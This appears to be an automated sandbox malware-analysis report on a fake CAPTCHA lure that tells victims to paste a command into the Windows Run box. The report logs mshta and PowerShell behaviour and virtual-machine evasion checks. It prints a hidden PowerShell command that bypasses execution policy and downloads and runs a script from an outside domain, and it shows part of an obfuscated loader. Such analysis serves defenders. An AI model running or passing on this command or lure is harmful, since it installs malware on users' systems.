        Source: screenshotOCR Text: x e about:blank X Verify You Are Human escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Verification Steps 1. Press Windows x Run Button 2. Press CTRL + V Type the name of a program, folder, document or Internet resource and Windows will open it for you. 3. Press Enter Q pen: 0K 15:03 ENG p Type here to search SG 15/01/2025
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1747
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7641
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2051
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7782
        Source: C:\Windows\System32\svchost.exe TID: 4412Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep count: 1747 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep count: 7641 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 2051 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 7782 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -90000s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
        Encrypted powershell cmdline option found
        Source: C:\Windows\System32\mshta.exeProcess created: Base64 decoded $nMq5LiObPXHWFHldk9PS1OGyR43IcwrXZdOMbFNKTQ = $fALsE$zFQPaqsw6zu2eh5JcNHZhlyocZhWZ1jk4bKQctkmaXilCz2psLLjLzuckbTtyEEVrHym2chEBuQ7cydN = $TRUe$kMIbwIS8Tq3660kan2CYFMcdWeNBW1wYVuzoCbZ66yrnWeuw9MDIwDgeSKd5pY1GYiHWgEWLyQR8d2Jo7TkMQcM3k3oER7hsZNNs8O3NCb3APNj4MlFSelwMtSizBXiQpPcVkxtHQYCUCW2SIwHPGlYpKtuGdJcKaX666ngrS86DvEDg0eDGsqRHxdgm6NEqOkc6G7GDQDFvupBGqv4j5ElpyPv0qcN7Z5guweLDUuUrPql = $nULL$mdAMYmUEbbpxBWYAasZmNSW7OLJArePHXHTTQ5s6MqqnwwE0peWGeZMoNtJ3FR7SxuYcqsdjsbbmkixPzgfjSnJ9AFWEYKLEYYrLBCedX4dKnIZFwwbhADVsMObluX8RYEIaLOqMCPHwDuYxTO4t2HmlzFycMmH18cGzJZgI5sxSnyef6nyptKev5AX5RwB4dkqEIMfQW3tGCRVMOpE4GtiAymB6f3cdr7BMQPGimYbdRmPV5ARYhbSg7zoKTtNgIIEIHncZV204sNURdbN9cWWQKuMpjqmhymGcQw0C7uuTQrG01Ff2Xz ="Defla" + "teStream";$d1OBxL17U144VQli9d9QOL75zT03xHILbkzdg9X5AXcE1x0Pu8UQ9TbmEV9bTaXFcO82xU7lwnVSsQ2s8EhdgDiZkO7Sgz0ORNzSsZ7AjBTZId8bQ8B5Q6OsRle6dHQkZpLyqrpiuMmXQRWYFl8EolIWQt5pgMj6YupRcD9x6SMX1sZ3T5nF9z6uLlcJ9GEiTZ9aTL8f5qbYLgj2Ryn9ijNtnxTrmsQcqg1VZkPhVhd5worNvn25fXXOaSw1jWGAkjd4LzwOnldpjDd1KShXd7oSY7NPxyULs7gF9eqcSOn92fcfIQyFzKewaHrxIQofODeLbYCtqLisaFMcQzCltkdm3R9MOpl = "Compre" + "ssion"; $1psJbjhOhuL6VmxZBo3NEB9tYRkTeLkMUI4dj06lmRLFJ7NLmbHI6QSP2g520PuNhCkeLd48PwTUlARm8N2SeaiVXfd2JjauwWjW34suQavdDbREc1aN6tVi8XvH2wbNGO15GZK32q6kL1ZOaQcCMkUeg8jsgjyzoZFFFpzRyIxxFuaDwBu1gQtOrhVXeL9nKiMYWHFPYWQDi7XUojHckscvdTSkWORLXQsnLHhq1rBnmBDqyhtKPkF0MBhIUB4zlkMHTSDVLCOy56Xm6g6ZsmXAsz4VpMW31NGoSkR9qsQeJyRv4JR3NQbcJMXhiaR5izxkw4LXSyH97epHdRHHh5C2hxrrnBY5lIbjdL4doY0u9hGguYw6bYmjTMxzFDg5nP8A
